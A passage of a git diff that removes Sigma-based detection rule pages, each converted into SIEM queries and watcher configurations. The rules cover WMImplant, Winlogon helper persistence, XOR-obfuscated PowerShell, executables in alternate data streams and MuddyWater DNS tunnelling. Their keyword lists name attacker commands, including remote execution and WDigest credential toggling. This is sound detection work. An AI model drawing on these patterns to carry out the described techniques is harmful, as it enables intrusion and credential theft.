-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"4104\" AND \\*.keyword:(*Set\\-ItemProperty* OR *New\\-Item*) AND \"*CurrentVersion\\\\Winlogon*\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Winlogon Helper DLL'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4104" AND \*.keyword:(*Set\-ItemProperty* OR *New\-Item*) AND "*CurrentVersion\\Winlogon*")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode="4104" ("*Set-ItemProperty*" OR "*New-Item*") "*CurrentVersion\\Winlogon*")
-```
-
-
-### logpoint
-    
-```
-(event_id="4104" ("*Set-ItemProperty*" OR "*New-Item*") "*CurrentVersion\\Winlogon*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4104)(?=.*(?:.*(?:.*.*Set-ItemProperty.*|.*.*New-Item.*)))(?=.*.*CurrentVersion\Winlogon.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_wmimplant.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_wmimplant.md
deleted file mode 100644
index 0ac8f54..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_wmimplant.md
+++ /dev/null
@@ -1,194 +0,0 @@
-| Title                    | WMImplant Hack Tool       |
-|:-------------------------|:------------------|
-| **Description**          | Detects parameters used by WMImplant |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0036_4104_windows_powershell_script_block](../Data_Needed/DN0036_4104_windows_powershell_script_block.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Administrative scripts that use the same keywords.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/FortyNorthSecurity/WMImplant](https://github.com/FortyNorthSecurity/WMImplant)</li></ul>  |
-| **Author**               | NVISO |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WMImplant Hack Tool
-id: 8028c2c3-e25a-46e3-827f-bbb5abf181d7
-status: experimental
-description: Detects parameters used by WMImplant
-references:
-  - https://github.com/FortyNorthSecurity/WMImplant
-tags:
-  - attack.execution
-  - attack.t1047
-author: NVISO
-date: 2020/03/26
-logsource:
-  product: windows
-  service: powershell
-  description: "Script block logging must be enabled"
-detection:
-  selection:
-    ScriptBlockText|contains:
-      - "WMImplant"
-      - " change_user "
-      - " gen_cli "
-      - " command_exec "
-      - " disable_wdigest "
-      - " disable_winrm "
-      - " enable_wdigest "
-      - " enable_winrm "
-      - " registry_mod "
-      - " remote_posh "
-      - " sched_job "
-      - " service_mod "
-      - " process_kill "
-      # - " process_start "
-      - " active_users "
-      - " basic_info "
-      # - " drive_list "
-      # - " installed_programs "
-      - " power_off "
-      - " vacant_system "
-      - " logon_events "
-  condition: selection
-falsepositives:
-  - Administrative scripts that use the same keywords.
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.message -match "ScriptBlockText.*.*WMImplant.*" -or $_.message -match "ScriptBlockText.*.* change_user .*" -or $_.message -match "ScriptBlockText.*.* gen_cli .*" -or $_.message -match "ScriptBlockText.*.* command_exec .*" -or $_.message -match "ScriptBlockText.*.* disable_wdigest .*" -or $_.message -match "ScriptBlockText.*.* disable_winrm .*" -or $_.message -match "ScriptBlockText.*.* enable_wdigest .*" -or $_.message -match "ScriptBlockText.*.* enable_winrm .*" -or $_.message -match "ScriptBlockText.*.* registry_mod .*" -or $_.message -match "ScriptBlockText.*.* remote_posh .*" -or $_.message -match "ScriptBlockText.*.* sched_job .*" -or $_.message -match "ScriptBlockText.*.* service_mod .*" -or $_.message -match "ScriptBlockText.*.* process_kill .*" -or $_.message -match "ScriptBlockText.*.* active_users .*" -or $_.message -match "ScriptBlockText.*.* basic_info .*" -or $_.message -match "ScriptBlockText.*.* power_off .*" -or $_.message -match "ScriptBlockText.*.* vacant_system .*" -or $_.message -match "ScriptBlockText.*.* logon_events .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-ScriptBlockText.keyword:(*WMImplant* OR *\ change_user\ * OR *\ gen_cli\ * OR *\ command_exec\ * OR *\ disable_wdigest\ * OR *\ disable_winrm\ * OR *\ enable_wdigest\ * OR *\ enable_winrm\ * OR *\ registry_mod\ * OR *\ remote_posh\ * OR *\ sched_job\ * OR *\ service_mod\ * OR *\ process_kill\ * OR *\ active_users\ * OR *\ basic_info\ * OR *\ power_off\ * OR *\ vacant_system\ * OR *\ logon_events\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8028c2c3-e25a-46e3-827f-bbb5abf181d7 <<EOF
-{
-  "metadata": {
-    "title": "WMImplant Hack Tool",
-    "description": "Detects parameters used by WMImplant",
-    "tags": [
-      "attack.execution",
-      "attack.t1047"
-    ],
-    "query": "ScriptBlockText.keyword:(*WMImplant* OR *\\ change_user\\ * OR *\\ gen_cli\\ * OR *\\ command_exec\\ * OR *\\ disable_wdigest\\ * OR *\\ disable_winrm\\ * OR *\\ enable_wdigest\\ * OR *\\ enable_winrm\\ * OR *\\ registry_mod\\ * OR *\\ remote_posh\\ * OR *\\ sched_job\\ * OR *\\ service_mod\\ * OR *\\ process_kill\\ * OR *\\ active_users\\ * OR *\\ basic_info\\ * OR *\\ power_off\\ * OR *\\ vacant_system\\ * OR *\\ logon_events\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "ScriptBlockText.keyword:(*WMImplant* OR *\\ change_user\\ * OR *\\ gen_cli\\ * OR *\\ command_exec\\ * OR *\\ disable_wdigest\\ * OR *\\ disable_winrm\\ * OR *\\ enable_wdigest\\ * OR *\\ enable_winrm\\ * OR *\\ registry_mod\\ * OR *\\ remote_posh\\ * OR *\\ sched_job\\ * OR *\\ service_mod\\ * OR *\\ process_kill\\ * OR *\\ active_users\\ * OR *\\ basic_info\\ * OR *\\ power_off\\ * OR *\\ vacant_system\\ * OR *\\ logon_events\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WMImplant Hack Tool'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-ScriptBlockText.keyword:(*WMImplant* * change_user * * gen_cli * * command_exec * * disable_wdigest * * disable_winrm * * enable_wdigest * * enable_winrm * * registry_mod * * remote_posh * * sched_job * * service_mod * * process_kill * * active_users * * basic_info * * power_off * * vacant_system * * logon_events *)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" (ScriptBlockText="*WMImplant*" OR ScriptBlockText="* change_user *" OR ScriptBlockText="* gen_cli *" OR ScriptBlockText="* command_exec *" OR ScriptBlockText="* disable_wdigest *" OR ScriptBlockText="* disable_winrm *" OR ScriptBlockText="* enable_wdigest *" OR ScriptBlockText="* enable_winrm *" OR ScriptBlockText="* registry_mod *" OR ScriptBlockText="* remote_posh *" OR ScriptBlockText="* sched_job *" OR ScriptBlockText="* service_mod *" OR ScriptBlockText="* process_kill *" OR ScriptBlockText="* active_users *" OR ScriptBlockText="* basic_info *" OR ScriptBlockText="* power_off *" OR ScriptBlockText="* vacant_system *" OR ScriptBlockText="* logon_events *"))
-```
-
-
-### logpoint
-    
-```
-ScriptBlockText IN ["*WMImplant*", "* change_user *", "* gen_cli *", "* command_exec *", "* disable_wdigest *", "* disable_winrm *", "* enable_wdigest *", "* enable_winrm *", "* registry_mod *", "* remote_posh *", "* sched_job *", "* service_mod *", "* process_kill *", "* active_users *", "* basic_info *", "* power_off *", "* vacant_system *", "* logon_events *"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*WMImplant.*|.*.* change_user .*|.*.* gen_cli .*|.*.* command_exec .*|.*.* disable_wdigest .*|.*.* disable_winrm .*|.*.* enable_wdigest .*|.*.* enable_winrm .*|.*.* registry_mod .*|.*.* remote_posh .*|.*.* sched_job .*|.*.* service_mod .*|.*.* process_kill .*|.*.* active_users .*|.*.* basic_info .*|.*.* power_off .*|.*.* vacant_system .*|.*.* logon_events .*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_xor_commandline.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_xor_commandline.md
deleted file mode 100644
index 7f5dbbc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_xor_commandline.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Suspicious XOR Encoded PowerShell Command Line       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Teymur Kheirkhabarov, Harish Segar (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious XOR Encoded PowerShell Command Line
-id: 812837bb-b17f-45e9-8bd0-0ec35d2e3bd6
-description: Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.
-status: experimental
-author: Teymur Kheirkhabarov, Harish Segar (rule)
-date: 2020/06/29
-tags:
-  - attack.execution
-  - attack.t1086
-  - attack.t1059.001
-logsource:
-  product: windows
-  service: powershell-classic
-detection:
-  selection:
-    EventID: 400
-    HostName: "ConsoleHost"
-  filter:
-    CommandLine|contains:
-      - "bxor"
-      - "join"
-      - "char"
-  condition: selection and filter
-falsepositives:
-  - unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Windows PowerShell | where {($_.ID -eq "400" -and $_.message -match "HostName.*ConsoleHost" -and ($_.message -match "CommandLine.*.*bxor.*" -or $_.message -match "CommandLine.*.*join.*" -or $_.message -match "CommandLine.*.*char.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"400" AND HostName:"ConsoleHost" AND winlog.event_data.CommandLine.keyword:(*bxor* OR *join* OR *char*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/812837bb-b17f-45e9-8bd0-0ec35d2e3bd6 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious XOR Encoded PowerShell Command Line",
-    "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_id:\"400\" AND HostName:\"ConsoleHost\" AND winlog.event_data.CommandLine.keyword:(*bxor* OR *join* OR *char*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"400\" AND HostName:\"ConsoleHost\" AND winlog.event_data.CommandLine.keyword:(*bxor* OR *join* OR *char*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious XOR Encoded PowerShell Command Line'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"400" AND HostName:"ConsoleHost" AND CommandLine.keyword:(*bxor* *join* *char*))
-```
-
-
-### splunk
-    
-```
-(source="Windows PowerShell" EventCode="400" HostName="ConsoleHost" (CommandLine="*bxor*" OR CommandLine="*join*" OR CommandLine="*char*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="400" HostName="ConsoleHost" CommandLine IN ["*bxor*", "*join*", "*char*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*400)(?=.*ConsoleHost)(?=.*(?:.*.*bxor.*|.*.*join.*|.*.*char.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_ads_executable.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_ads_executable.md
deleted file mode 100644
index e4ad993..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_ads_executable.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Executable in ADS       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the creation of an ADS data stream that contains an executable (non-empty imphash) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/0xrawsec/status/1002478725605273600?s=21](https://twitter.com/0xrawsec/status/1002478725605273600?s=21)</li></ul>  |
-| **Author**               | Florian Roth, @0xrawsec |
-| Other Tags           | <ul><li>attack.s0139</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Executable in ADS
-id: b69888d4-380c-45ce-9cf9-d9ce46e67821
-status: experimental
-description: Detects the creation of an ADS data stream that contains an executable (non-empty imphash)
-references:
-    - https://twitter.com/0xrawsec/status/1002478725605273600?s=21
-tags:
-    - attack.defense_evasion
-    - attack.t1027
-    - attack.s0139
-author: Florian Roth, @0xrawsec
-date: 2018/06/03
-logsource:
-    product: windows
-    service: sysmon
-    definition: 'Requirements: Sysmon config with Imphash logging activated'
-detection:
-    selection:
-        EventID: 15
-    filter1:
-        Imphash: '00000000000000000000000000000000'
-    filter2:
-        Imphash: null
-    condition: selection and not 1 of filter*
-fields:
-    - TargetFilename
-    - Image
-falsepositives:
-    - unknown
-level: critical
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "15" -and  -not (($_.message -match "Imphash.*00000000000000000000000000000000") -or (-not Imphash="*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"15" AND (NOT ((winlog.event_data.Imphash:("00000000000000000000000000000000" OR "00000000000000000000000000000000")) OR (NOT _exists_:winlog.event_data.Imphash))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b69888d4-380c-45ce-9cf9-d9ce46e67821 <<EOF
-{
-  "metadata": {
-    "title": "Executable in ADS",
-    "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1027",
-      "attack.s0139"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"15\" AND (NOT ((winlog.event_data.Imphash:(\"00000000000000000000000000000000\" OR \"00000000000000000000000000000000\")) OR (NOT _exists_:winlog.event_data.Imphash))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"15\" AND (NOT ((winlog.event_data.Imphash:(\"00000000000000000000000000000000\" OR \"00000000000000000000000000000000\")) OR (NOT _exists_:winlog.event_data.Imphash))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Executable in ADS'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nTargetFilename = {{_source.TargetFilename}}\n         Image = {{_source.Image}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"15" AND (NOT ((Imphash:("00000000000000000000000000000000" "00000000000000000000000000000000")) OR (NOT _exists_:Imphash))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="15" NOT ((Imphash="00000000000000000000000000000000") OR (NOT Imphash="*"))) | table TargetFilename,Image
-```
-
-
-### logpoint
-    
-```
-(event_id="15"  -((Imphash="00000000000000000000000000000000") OR (-Imphash=*)))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*15)(?=.*(?!.*(?:.*(?:.*(?:.*(?=.*00000000000000000000000000000000))|.*(?:.*(?=.*(?!Imphash))))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_alternate_powershell_hosts_pipe.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_alternate_powershell_hosts_pipe.md
deleted file mode 100644
index ca42f87..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_alternate_powershell_hosts_pipe.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Alternate PowerShell Hosts Pipe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Programs using PowerShell directly without invocation of a dedicated interpreter.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/alternate_signed_powershell_hosts.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/alternate_signed_powershell_hosts.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Alternate PowerShell Hosts Pipe
-id: 58cb02d5-78ce-4692-b3e1-dce850aae41a
-description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
-status: experimental
-date: 2019/09/12
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/alternate_signed_powershell_hosts.md
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 17
-        PipeName|startswith: '\PSHost'
-    filter:
-        Image|endswith:
-            - '\powershell.exe'
-            - '\powershell_ise.exe'
-    condition: selection and not filter
-fields:
-    - ComputerName
-    - User
-    - Image
-    - PipeName
-falsepositives:
-    - Programs using PowerShell directly without invocation of a dedicated interpreter.
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "17" -and $_.message -match "PipeName.*\\PSHost.*") -and  -not (($_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\powershell_ise.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND (winlog.event_id:"17" AND winlog.event_data.PipeName.keyword:\\PSHost*) AND (NOT (winlog.event_data.Image.keyword:(*\\powershell.exe OR *\\powershell_ise.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/58cb02d5-78ce-4692-b3e1-dce850aae41a <<EOF
-{
-  "metadata": {
-    "title": "Alternate PowerShell Hosts Pipe",
-    "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND (winlog.event_id:\"17\" AND winlog.event_data.PipeName.keyword:\\\\PSHost*) AND (NOT (winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\powershell_ise.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND (winlog.event_id:\"17\" AND winlog.event_data.PipeName.keyword:\\\\PSHost*) AND (NOT (winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\powershell_ise.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Alternate PowerShell Hosts Pipe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n       Image = {{_source.Image}}\n    PipeName = {{_source.PipeName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"17" AND PipeName.keyword:\\PSHost*) AND (NOT (Image.keyword:(*\\powershell.exe *\\powershell_ise.exe))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode="17" PipeName="\\PSHost*") NOT ((Image="*\\powershell.exe" OR Image="*\\powershell_ise.exe"))) | table ComputerName,User,Image,PipeName
-```
-
-
-### logpoint
-    
-```
-((event_id="17" PipeName="\\PSHost*")  -(Image IN ["*\\powershell.exe", "*\\powershell_ise.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*17)(?=.*\PSHost.*)))(?=.*(?!.*(?:.*(?=.*(?:.*.*\powershell\.exe|.*.*\powershell_ise\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_apt_muddywater_dnstunnel.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_apt_muddywater_dnstunnel.md
deleted file mode 100644
index dcea57e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_apt_muddywater_dnstunnel.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | DNS Tunnel Technique from MuddyWater       |
-|:-------------------------|:------------------|
-| **Description**          | Detecting DNS tunnel activity for Muddywater actor |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1071: Application Layer Protocol](https://attack.mitre.org/techniques/T1071)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/](https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/)</li><li>[https://www.vmray.com/analyses/5ad401c3a568/report/overview.html](https://www.vmray.com/analyses/5ad401c3a568/report/overview.html)</li></ul>  |
-| **Author**               | @caliskanfurkan_ |
-| Other Tags           | <ul><li>attack.t1071.004</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: DNS Tunnel Technique from MuddyWater
-id: 36222790-0d43-4fe8-86e4-674b27809543
-description: Detecting DNS tunnel activity for Muddywater actor
-author: '@caliskanfurkan_'
-status: experimental
-date: 2020/06/04
-references:
-    - https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/
-    - https://www.vmray.com/analyses/5ad401c3a568/report/overview.html
-tags:
-    - attack.command_and_control
-    - attack.t1071
-    - attack.t1071.004
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith:
-            - '\powershell.exe'
-        ParentImage|endswith:
-            - '\excel.exe'
-        CommandLine|contains:
-            - 'DataExchange.dll'
-    condition: selection
-falsepositives:
-    - Unkown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
